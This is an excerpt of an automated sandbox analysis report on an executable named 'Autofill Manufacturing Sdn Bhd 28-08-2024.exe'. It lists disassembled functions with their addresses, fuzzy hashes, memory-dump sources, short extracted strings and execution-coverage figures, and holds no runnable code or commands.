Snapshot File: hcaresult_0_2_a2d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9f8b959b4d9a4f2ead7c90d74b66e25be8fdd5219eeef44795c81beb582108d
Instruction ID: 6db2f1202002443bfc61dc78cd262b11434722771d9862b64ba5f1f9ba0ab07e
Opcode Fuzzy Hash: c9f8b959b4d9a4f2ead7c90d74b66e25be8fdd5219eeef44795c81beb582108d
Instruction Fuzzy Hash: 0CF0C2724043449FE7208F1AD984B62FBD8EB81734F28C46AED084F283C2789840CAB1

Non-executed Functions

Function 06719620 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50d3bd3b5b9f109c685c7ea671b213873dbe24e4666ff7056463ac713b2f2f30
Instruction ID: 0d91431d86e7090ed7bc54e52ddd683f674e774bf1962d6e389ea6fc726f75f9
Opcode Fuzzy Hash: 50d3bd3b5b9f109c685c7ea671b213873dbe24e4666ff7056463ac713b2f2f30
Instruction Fuzzy Hash: 76E10C74E002198FDB54DF99C590AAEFBF2FF89304F24815AD514AB35AD730A942CF61

Function 0671A458 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e828fbd8ef1860431ca5641926edb5a31a49f979f0bc3b7f4e040b0ebbb15ee
Instruction ID: 66dc4cb444b1342637f1a9a5d0a5b8ee32b415b9234c4cc7f232db7ddfec4b01
Opcode Fuzzy Hash: 3e828fbd8ef1860431ca5641926edb5a31a49f979f0bc3b7f4e040b0ebbb15ee
Instruction Fuzzy Hash: 84E10C74E052198FDB14DFA9C580AAEFBF2FF89304F24816AD414AB35AD7319941CF61

Function 06717F78 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e4e50851a59a336024f00a4ec0256402aabf968c4227a9973f5379badb18cb6
Instruction ID: 0777b983d5e10f6bd7bb7233a592e2ab62ce8ccc886c4458acb680372301b37b
Opcode Fuzzy Hash: 8e4e50851a59a336024f00a4ec0256402aabf968c4227a9973f5379badb18cb6
Instruction Fuzzy Hash: 31E1DC74E002198FDB54DFA9C580AAEFBF2BF89304F24816AD414AB35AD7319941CFA1

Function 06719F48 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20b715b81f671ef6eb4b12d61d7443ed3084b27f5e4953d0be40d4a5061808be
Instruction ID: 802791c37d92f26e3bd88627c0af83a2e6f71cf4b243fb79a89e688b138e2fe6
Opcode Fuzzy Hash: 20b715b81f671ef6eb4b12d61d7443ed3084b27f5e4953d0be40d4a5061808be
Instruction Fuzzy Hash: DAE1EA74E012198FDB54DFA9C580AAEFBF2FF89304F24816AD414AB35AD731A941CF61

Function 06717B40 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb9183e9d39ee51de1cf822a52a169778551b343c0fc0e33aa97705cb367027f
Instruction ID: f69f4e5ee6cb7257f6c5405551607988dec041e04f2f0de2db444edfe6fcc161
Opcode Fuzzy Hash: eb9183e9d39ee51de1cf822a52a169778551b343c0fc0e33aa97705cb367027f
Instruction Fuzzy Hash: 27E1E874E002198FDB54DFA9C580AAEFBF2BF89304F24816AD415AB35AD731AD41CF60

Function 00B0E314 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1279842950.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c6133a9c8cb14476b2321f4471d2031daf7683d6e2b87c6c4cdaf5e2e73af1c
Instruction ID: ea4d011e07d00a2d60a3116a85e3cde6f7d2d3194f6ee45da9bfd4bdd3c2aefb
Opcode Fuzzy Hash: 6c6133a9c8cb14476b2321f4471d2031daf7683d6e2b87c6c4cdaf5e2e73af1c
Instruction Fuzzy Hash: 76A14E32A002069FCF15DFB5C8405AEBBF2FF84300B1585BAE816AB265DB71E955CF90

Function 06717F68 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dca63f096b731adacee4792dfebc8c1d82f1f42ba147d08c9aa345a2bf8a0bf
Instruction ID: 3e2fa9eec54cca4f224f57b174111acce28d111277f1dc750a46e27f66952bba
Opcode Fuzzy Hash: 7dca63f096b731adacee4792dfebc8c1d82f1f42ba147d08c9aa345a2bf8a0bf
Instruction Fuzzy Hash: A4511C74E042198FDB14CFA9C9805AEFBF2BF89304F2481AAD418BB356D7309941CFA1

Analysis Process: Autofill Manufacturing Sdn Bhd 28-08-2024.exePID: 4820, Parent PID: 7968COMMON

Execution Graph

Execution Coverage:	17.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	23.4%
Total number of Nodes:	47
Total number of Limit Nodes:	9

Executed Functions

Function 010A9DE0 Relevance: 6.1, Strings: 4, Instructions: 1137COMMON

Download Yara Rule

Strings

4'q, xrefs: 010A9F0C
4'q, xrefs: 010A9E04
(oq, xrefs: 010AA518
4'q, xrefs: 010AAB13

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: (oq$4'q$4'q$4'q
API String ID: 0-2528434116
Opcode ID: 28c16fcc2772faa3ea72243f400440eb6596a07ff35663be903d460d61ce9a79
Instruction ID: fd3604ff71d86e6f29badf15def56d29c8d181e0fb4af0d4c7892034b033bc36
Opcode Fuzzy Hash: 28c16fcc2772faa3ea72243f400440eb6596a07ff35663be903d460d61ce9a79
Instruction Fuzzy Hash: 85A2A070B00209CFCB15CFA8C594AAEBBF6BF88300F5585A9E585DB2A6D735EC41CB51

Function 010A29EC Relevance: 5.5, Strings: 4, Instructions: 490
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xq, xrefs: 010A2A9E
Xq, xrefs: 010A2AD8
Xq, xrefs: 010A2B57
Xq, xrefs: 010A2BA4

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: Xq$Xq$Xq$Xq
API String ID: 0-3965792415
Opcode ID: f2c6242aaada4b73e4c6d88aa04ac056e898e8513b9259c60174dd2cce56dd87
Instruction ID: eda1e146a0ab47d091a9a8d5feb7e12c3b294c5ebfb646ee40379ef84601f148
Opcode Fuzzy Hash: f2c6242aaada4b73e4c6d88aa04ac056e898e8513b9259c60174dd2cce56dd87
Instruction Fuzzy Hash: 0B02D131A0C7D58FDBA78FB884612EABFB0AF0B314B5898EDC4C55E517C6354852EB42

Function 010A6FC8 Relevance: 5.5, Strings: 4, Instructions: 451
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,q, xrefs: 010A7298
(oq, xrefs: 010A7212
,q, xrefs: 010A728A
(oq, xrefs: 010A7220

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: (oq$(oq$,q$,q
API String ID: 0-620556200
Opcode ID: 0c6732cb9a9edbe172bf5a03ea7bf8f7d20731b8b4571aa935f4fb26b2f6fe93
Instruction ID: 978a511b4ae91bc43bbf29ba82996939a94a72c25413137541a49e23ada5fb60
Opcode Fuzzy Hash: 0c6732cb9a9edbe172bf5a03ea7bf8f7d20731b8b4571aa935f4fb26b2f6fe93
Instruction Fuzzy Hash: C0026271A00219DFDB55CFA8C884AADBBF2BF88300F95C0A9E9859B261D736DC41CF51

Function 010A69A0 Relevance: 3.0, Strings: 2, Instructions: 515COMMON

Download Yara Rule

Strings

Hq, xrefs: 010A6DA6
(oq, xrefs: 010A6EDA

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: (oq$Hq
API String ID: 0-2917151738
Opcode ID: fa8d41b7b8c9129cbe3abfd989483635b22d399a78686db93af1e53b22b4d96a
Instruction ID: 5f1f1074fa2b80b59ebd993286fc43bc26fe285b9701426adb5e0e7ff3f36de3
Opcode Fuzzy Hash: fa8d41b7b8c9129cbe3abfd989483635b22d399a78686db93af1e53b22b4d96a
Instruction Fuzzy Hash: 8B12AF70A002198FDB15DFA9C854BAEBBF6BF88340F588169E486DB395DB359D41CF80

Function 010A3E09 Relevance: 2.8, Strings: 2, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 010A3E2E
Xq, xrefs: 010A3E47

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: Xq$$q
API String ID: 0-855381642
Opcode ID: 858dac554363508e470bfa08be614fc91ac0009ea22ee462c24c949de2c6a63a
Instruction ID: b7947322625d7e2bfff06dbba47b03efdcadd9ed9b91cb0036817a3c7786bdc6
Opcode Fuzzy Hash: 858dac554363508e470bfa08be614fc91ac0009ea22ee462c24c949de2c6a63a
Instruction Fuzzy Hash: 9E91A534B44219DFDB18DBB4845467E7BA7BFC8300B59862DE482EB388CE799C029791

Function 010AC146 Relevance: 2.7, Strings: 2, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 010AC400
PHq, xrefs: 010AC3EF

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: d9472439bc6c1bbdec06784f52a6d5c1ba15176531ad06b2444c437e7e1f45e2
Instruction ID: 6571315e91ad21b527b5cc4daefd94f7d18132503a071da0ab44c4c9ccb47461
Opcode Fuzzy Hash: d9472439bc6c1bbdec06784f52a6d5c1ba15176531ad06b2444c437e7e1f45e2
Instruction Fuzzy Hash: 55A10575E00218DFEB54CFA9D984A9DBBF2BF89300F5580AAE449EB365DB309941CF50

Function 010AC468 Relevance: 2.7, Strings: 2, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 010AC6BF
PHq, xrefs: 010AC6D0

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 18339a30343474af226c88c628777af6a124a13b0d08c815be850463531d2efb
Instruction ID: 6e07b239900d0a76d1c16314b64f8f3415a3c783699c5c882b2449340212375a
Opcode Fuzzy Hash: 18339a30343474af226c88c628777af6a124a13b0d08c815be850463531d2efb
Instruction Fuzzy Hash: 0091C574E00218CFEB54DFAAD984B9DBBF2BF88300F558069E459AB365DB349941CF50

Function 010A5362 Relevance: 2.7, Strings: 2, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 010A55C8
PHq, xrefs: 010A55D9

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 92f089078314b7b8a17413054eac2e500a6b37781e280a718a3c9ea07c45cfd8
Instruction ID: 08c8fe7151bd7301659fb57d20674dd3ba75deeda622659b0a7d9976919729d2
Opcode Fuzzy Hash: 92f089078314b7b8a17413054eac2e500a6b37781e280a718a3c9ea07c45cfd8
Instruction Fuzzy Hash: 6691D574E00218CFEB54CFA9D894A9DBBF2BF89300F5480AAE459AB365DB349945CF50

Function 010AD278 Relevance: 2.7, Strings: 2, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 010AD4E0
PHq, xrefs: 010AD4CF

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 4aab7ef55d0ad908a94f8135f46629237da8c155f7ad2cf9f9ea48c329576f8e
Instruction ID: 444dcecc51b483b37f262ce8b5079a7723303c90a51b92f9307b230e84866df4
Opcode Fuzzy Hash: 4aab7ef55d0ad908a94f8135f46629237da8c155f7ad2cf9f9ea48c329576f8e
Instruction Fuzzy Hash: A581A074E00218CFEB54DFEAD884A9DBBF2BF89300F5480A9E459AB365DB349945CF10

Function 010ACA08 Relevance: 2.7, Strings: 2, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 010ACC5F
PHq, xrefs: 010ACC70

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: b97a6fad52db81565283e90120d6869a283d6ccf9712d7f2978f50c69d6ce6a5
Instruction ID: daf3c7774aeab9f7060ccb496d2971f23d17fa4fd94b369bfcae85e05a6bb66e
Opcode Fuzzy Hash: b97a6fad52db81565283e90120d6869a283d6ccf9712d7f2978f50c69d6ce6a5
Instruction Fuzzy Hash: 7781B274E00218CFEB54DFAAD984A9DBBF2BF88300F55C069E459AB364DB359981CF50

Function 010ACCD8 Relevance: 2.7, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 010ACF2F
PHq, xrefs: 010ACF40

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 306fac65aebcb242ea2effed72fbf390ddf2bd77a02d58a847285b60a6d9bab8
Instruction ID: b5500dda3c07b645a7542a6c6d107792066c89e0e6d9dac17640c1cb6df560b5
Opcode Fuzzy Hash: 306fac65aebcb242ea2effed72fbf390ddf2bd77a02d58a847285b60a6d9bab8
Instruction Fuzzy Hash: 0681D374E00218CFEB54DFAAD984A9DBBF2BF88300F55C0A9E459AB365DB345981CF50

Function 010AC738 Relevance: 2.7, Strings: 2, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 010AC98F
PHq, xrefs: 010AC9A0

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 0bfc01146ad067a53dbdefa7e0e81fe9475d8b78adaf8ba2167e9a4c65410c20
Instruction ID: c8029dce228a53e99b8321bf9f4dd06e60a9404222c7a6cc3d507afba4b8d40e
Opcode Fuzzy Hash: 0bfc01146ad067a53dbdefa7e0e81fe9475d8b78adaf8ba2167e9a4c65410c20
Instruction Fuzzy Hash: 7381A074E00218CFEB54DFAAD984B9DBBF2BF88300F55806AE459AB365DB349941CF50

Function 010ACFA9 Relevance: 2.7, Strings: 2, Instructions: 183COMMON

Download Yara Rule

Strings

PHq, xrefs: 010AD1FF
PHq, xrefs: 010AD210

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 7476be6b7c01b2beaf9d4def3c582841f630f358a47dd5c554079171e14293ae
Instruction ID: ac25d708f8da0412c5b14d59c9c1a501da31dc52cd57006940c706806df4c01c
Opcode Fuzzy Hash: 7476be6b7c01b2beaf9d4def3c582841f630f358a47dd5c554079171e14293ae
Instruction Fuzzy Hash: 4381A074E00218DFEB54DFEAD984A9DBBF2BF88300F548069E459AB365DB349981CF10

Function 06929328 Relevance: 2.0, APIs: 1, Instructions: 532COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c1d1cbe258d398bcf3ee14d11c3ce32811dcaefbcf0c51dbf725a8df232de96
Instruction ID: 87e8706ae1c0ccd3edf1371d8ae31d4b8aa38c9418d398b981d6b97480204242
Opcode Fuzzy Hash: 3c1d1cbe258d398bcf3ee14d11c3ce32811dcaefbcf0c51dbf725a8df232de96
Instruction Fuzzy Hash: 11226C74E00229CFDB54DFA9D884B9DBBB6BF84300F1481A9D449AB759DB349D81CF90

Function 06920B30 Relevance: .7, Instructions: 709COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d88bcfd62010c6ad7cac404fa702f59f09923c794a803fe893cd8aca91ea1cf
Instruction ID: 0aabd2429243cf2d956e18bdce529fbc52555596598f8470e23393a3ef359409
Opcode Fuzzy Hash: 0d88bcfd62010c6ad7cac404fa702f59f09923c794a803fe893cd8aca91ea1cf
Instruction Fuzzy Hash: D172BE74E012298FDB64DF69C884BEDBBB2BB89300F5481EAD449A7355DB349E81CF50

Function 0692DE00 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff07ff3e297da791f428181e6bddbb3b7886507b4c4aaf0408d9b2f4240c5b33
Instruction ID: 35c9d8b7137143078c05630e92dd6639c1975e19330c8bd2804584db4b0b1cf7
Opcode Fuzzy Hash: ff07ff3e297da791f428181e6bddbb3b7886507b4c4aaf0408d9b2f4240c5b33
Instruction Fuzzy Hash: B1C1D274E01229CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB358DB359E85CF50

Function 06922968 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e5e9e8afd02fb9f74316ee91ed05cbe2501eeb07770af955de615ee9f6c9a07
Instruction ID: a556f05187755463b83d1b75910ee2cf0a3a58dfddbd8ed1dd3210d56f014010
Opcode Fuzzy Hash: 8e5e9e8afd02fb9f74316ee91ed05cbe2501eeb07770af955de615ee9f6c9a07
Instruction Fuzzy Hash: E6C1A178E01218CFDB54DFA5D994B9DBBB2BF89300F2081A9D809A7358DB359E85CF50

Function 06922DC8 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c11b19dd31771ea02d3067aff335612e801dc6a0ec30f65ae3de081536049fb
Instruction ID: c37596127db4a92d1605b4d9e5feec69b54314f128730dac37e7be1acceb4aca
Opcode Fuzzy Hash: 5c11b19dd31771ea02d3067aff335612e801dc6a0ec30f65ae3de081536049fb
Instruction Fuzzy Hash: 3FA11570D00219CFEB14DFA9D948BDDBBB1FF88304F208269E408AB2A5DB759984CF55

Function 06922DC3 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ec0d1472b0d6b6cf71fdcb83a691375c696d11b215d34a6a89fca8cda637f12
Instruction ID: 41fe26d2d3d987cf5d8af42d4b9ff8f590360bb94e8395ba668887224bafe036
Opcode Fuzzy Hash: 8ec0d1472b0d6b6cf71fdcb83a691375c696d11b215d34a6a89fca8cda637f12
Instruction Fuzzy Hash: 6CA11370D00219CFEB14DFA9D988BDDBBB1FF89300F208269E408AB295DB759984CF54

Function 0692310E Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc9566b31a9d11d07e91deb95b35c2702e3bb4fa9eaed57c84d4aefd16f9308d
Instruction ID: e2eb2b3c9008413b96b28b8b0705faa2c07f90545b9fbbd603143c72e549043a
Opcode Fuzzy Hash: bc9566b31a9d11d07e91deb95b35c2702e3bb4fa9eaed57c84d4aefd16f9308d
Instruction Fuzzy Hash: 46911570E00219CFEB50DFA8D888BEDBBB1FF49310F208259E409AB295DB759985CF54

Function 010AE988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ee3cd94da87fd20fbbe95bd3d4ad283ce10ad599384af11945569e0cd503315
Instruction ID: b87020b75ed0bb9b40aae66ec107df94a432244cfa50d346479c2febf2b1a32e
Opcode Fuzzy Hash: 8ee3cd94da87fd20fbbe95bd3d4ad283ce10ad599384af11945569e0cd503315
Instruction Fuzzy Hash: AB51A574E00308DFEB18DFAAD494A9DBBF2BF89300F648029E855AB364DB319845CF14

Function 010AE97B Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a37223d933fe57b846cc4daf8e7caa3402f7213daf79fca70e6f2b5faa0074b
Instruction ID: 674a021067af25d85f95fed64accf77eaf561d7896f2fc936a62cee70847a33b
Opcode Fuzzy Hash: 3a37223d933fe57b846cc4daf8e7caa3402f7213daf79fca70e6f2b5faa0074b
Instruction Fuzzy Hash: 4751B974E00208DFDB18DFAAD494A9DBBF2BF89300F64C02AE855AB364DB319845CF14

Function 010A76F1 Relevance: 10.5, Strings: 8, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 010A7BFF
,q, xrefs: 010A7B90
,q, xrefs: 010A7BA0
(oq, xrefs: 010A7815
(oq, xrefs: 010A77E9
(oq, xrefs: 010A78B2
(oq, xrefs: 010A7C0F
(oq, xrefs: 010A772E

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
API String ID: 0-2212926057
Opcode ID: 34846e8909ebce46f2d7a5ed67a8a91232881a419aee3aebd668f75598f01e61
Instruction ID: 7428e5e77980c099ecc1aadaec22c73a7125f746e31106702c90f77a0095c66a
Opcode Fuzzy Hash: 34846e8909ebce46f2d7a5ed67a8a91232881a419aee3aebd668f75598f01e61
Instruction Fuzzy Hash: 96127B70A00209DFDB15CFA8D894AAEBBF2FF89310F948599E585DB261D732ED41CB50

Function 010A5F38 Relevance: 2.8, Strings: 2, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 010A6023
Hq, xrefs: 010A6056

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: Hq$Hq
API String ID: 0-925789375
Opcode ID: 1cbb19d8c9872dfb25c1fcc6c8238d43c76310877771f4d844cbc5fb49313662
Instruction ID: 3352d0c60f8104cc49f55e26162ff4398e9c675ce5ca838196ff0e1ebd2ee0ea
Opcode Fuzzy Hash: 1cbb19d8c9872dfb25c1fcc6c8238d43c76310877771f4d844cbc5fb49313662
Instruction Fuzzy Hash: D791D1707042158FDB269F68C854B6E7BF2BF89340F484569E4C68B395DB3ACC42CB91

Function 010A6498 Relevance: 2.7, Strings: 2, Instructions: 232
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,q, xrefs: 010A6578
,q, xrefs: 010A656E

